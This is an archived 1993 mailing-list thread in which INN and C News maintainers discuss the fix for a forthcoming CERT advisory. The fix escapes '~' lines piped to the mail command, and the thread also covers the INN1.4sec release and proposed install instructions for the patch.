Sender: Alan P Barrett <barrett@daisy.ee.und.ac.za>
Date: Tue, 21 Dec 1993 09:06:29 +0200 (SAST)
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Subject: Re: Forthcoming CERT notice
To: Rich Salz <rsalz@uunet.UU.NET>
Cc: inn-gurus@uunet.UU.NET
In-Reply-To: <9312202028.AA00979@rodan.UU.NET>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


> !     ) | sed -e 's/^~/~~/' | ${MAILCMD} -s "checkgroups by ${FROM}" ${NEWSMASTER}

I would much prefer to change the definition of MAILCMD, instead of
changing all instances where it is used. 

In config.data:

   _PATH_MAILCMD	/usr/lib/news/bin/mailcmd

In mailcmd:

    #!/bin/sh
    sed -e 's/^~/~~/' | exec /usr/ucb/Mail ${1+"$@"}

Or something like that.

--apb (Alan Barrett)

From rsalz@uunet.uu.net Sun Dec 26 01:02:17 1993
Date: Wed, 22 Dec 93 10:26:22 -0500
From: rsalz@uunet.uu.net (Rich Salz)
To: inn-gurus@uunet.UU.NET
Subject: INN1.4-sec released

I put INN1.4sec, an intermediate release containing the CERT fix,
in the public area.  Mirror sites will pick it up soon.  The CERT
advisory will be going out after the holiday.  Anyone think I should
NOT send it to nntp-managers now?  If so, please let me know.
	/r$

From tom_limoncelli@Warren.MENTORG.COM Sun Dec 26 01:02:29 1993
From: Tom Limoncelli <tom_limoncelli@Warren.MENTORG.COM>
Subject: Re: Forthcoming CERT notice
To: rsalz@uunet.UU.NET (Rich Salz)
Date: Wed, 22 Dec 1993 11:02:32 -0500 (EST)
Cc: inn-gurus@uunet.UU.NET
In-Reply-To: <9312202028.AA00979@rodan.UU.NET> from "Rich Salz" at Dec 20, 93 03:28:37 pm
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1224      

Some notes about the patch:

1.  I only noticed that it affects C News until after I had read past
the INN diffs (because I was installing them).  Most C News users will
never get that far.  Maybe the header should note that it affects C
News and INN and that patches for both are included.  (Maybe listing C
News's patch first would be a good idea).

2.  No explicit install instructions are included.  I
hate when CERT reports do that.  Let's at least tell people
to:
	1.  cd $INN/samples
	2.  patch -p0  (is this correct?  I installed the
patches by hand so I'm not sure).
	3.  cd $INN/site
	4.  rm checkgroups default ihave rmgroup sendme sendsys
	5.  rm senduuname version writelog newgroup
	6.  cd $INN ; make install

3.  I haven't downloaded INN1.4sec yet.  Does it include "mailsend" or
does it use "sed"?  If it uses "mailsend", it should be noted in the
CERT advisory that INN1.4sec fixes the problem with a different
method.

Just some notes,
Tom

-- 
Tom Limoncelli -- tal@warren.mentorg.com (work) -- tal@plts.org (play)
"Psst!  Hey, Anthony!  Y'know what I        | Disclaimer:  I do not
like about existing?"  "Uh... uh... what?"  | speak for Mentor Graphics.
"Possessing a physical extension."  -TSA    |

